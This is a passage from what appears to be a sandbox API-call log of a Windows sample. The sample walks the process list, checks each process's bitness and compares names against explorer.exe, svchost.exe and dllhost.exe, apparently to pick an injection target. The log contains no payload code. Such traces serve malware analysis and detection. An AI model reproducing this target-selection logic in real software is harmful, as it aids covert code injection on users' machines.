0x0 [0256.490] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0256.490] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0256.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0256.491] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.491] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.491] CloseHandle (hObject=0xec) returned 1 [0256.491] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0256.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0256.491] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0256.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0256.492] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.492] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.492] CloseHandle (hObject=0xec) returned 1 [0256.492] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0256.493] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0256.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0256.493] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0256.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0256.494] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.494] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.494] CloseHandle (hObject=0xec) returned 1 [0256.494] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0256.494] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0256.494] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0256.494] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0256.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0256.494] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.494] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.494] CloseHandle (hObject=0xec) returned 1 [0256.494] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0256.494] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0256.494] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0256.494] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0256.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0256.495] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.495] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.495] CloseHandle (hObject=0xec) returned 1 [0256.495] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0256.495] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0256.495] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0256.495] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0256.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0256.496] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.496] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.496] CloseHandle (hObject=0xec) returned 1 [0256.496] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0256.496] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0256.496] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0256.496] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0256.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0256.496] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.496] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.496] CloseHandle (hObject=0xec) returned 1 [0256.496] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0256.496] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0256.496] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0256.496] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0256.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0256.497] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.497] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.497] CloseHandle (hObject=0xec) returned 1 [0256.497] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0256.497] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0256.497] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0256.497] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0256.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0256.498] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.498] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.498] CloseHandle (hObject=0xec) returned 1 [0256.498] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0256.498] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0256.498] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0256.498] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0256.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0256.498] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.498] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.498] CloseHandle (hObject=0xec) returned 1 [0256.498] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0256.498] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0256.498] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0256.498] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0256.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0256.499] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.499] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.499] CloseHandle (hObject=0xec) returned 1 [0256.499] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0256.499] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0256.499] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0256.499] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0256.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0256.500] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.500] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.500] CloseHandle (hObject=0xec) returned 1 [0256.500] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0256.500] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0256.500] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0256.500] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0256.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0256.500] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.500] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.500] CloseHandle (hObject=0xec) returned 1 [0256.500] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0256.500] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0256.500] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0256.500] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0256.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0256.501] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.501] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.501] CloseHandle (hObject=0xec) returned 1 [0256.501] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0256.501] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0256.501] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0256.501] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0256.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0256.502] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.502] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.502] CloseHandle (hObject=0xec) returned 1 [0256.502] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0256.502] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0256.502] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0256.502] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0256.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0256.502] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.502] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.502] CloseHandle (hObject=0xec) returned 1 [0256.502] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0256.502] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0256.502] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0256.502] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0256.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0256.503] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.503] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.503] CloseHandle (hObject=0xec) returned 1 [0256.503] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0256.503] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0256.503] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0256.503] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0256.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0256.504] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.504] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.504] CloseHandle (hObject=0xec) returned 1 [0256.504] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0256.504] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0256.504] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0256.504] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0256.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0256.504] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.504] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.504] CloseHandle (hObject=0xec) returned 1 [0256.504] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0256.504] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0256.504] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0256.505] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0256.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0256.505] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.505] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.505] CloseHandle (hObject=0xec) returned 1 [0256.505] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0256.505] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0256.505] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0256.505] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0256.506] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0256.506] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.506] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.506] CloseHandle (hObject=0xec) returned 1 [0256.506] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0256.506] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0256.506] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0256.506] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0256.506] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0256.506] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.506] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.506] CloseHandle (hObject=0xec) returned 1 [0256.506] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0256.506] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0256.507] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0256.507] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0256.507] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0256.507] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.507] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.507] CloseHandle (hObject=0xec) returned 1 [0256.507] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0256.507] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0256.507] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0256.507] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0256.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0256.508] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0256.508] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0256.509] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0256.509] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.509] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0256.509] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0256.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0256.510] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0256.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0256.510] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.510] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.510] CloseHandle (hObject=0xec) returned 1 [0256.510] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0256.511] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0256.511] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.511] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.511] CloseHandle (hObject=0xec) returned 1 [0256.511] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0256.511] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0256.511] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.511] IsWow64Process (in: hProcess=0xec, 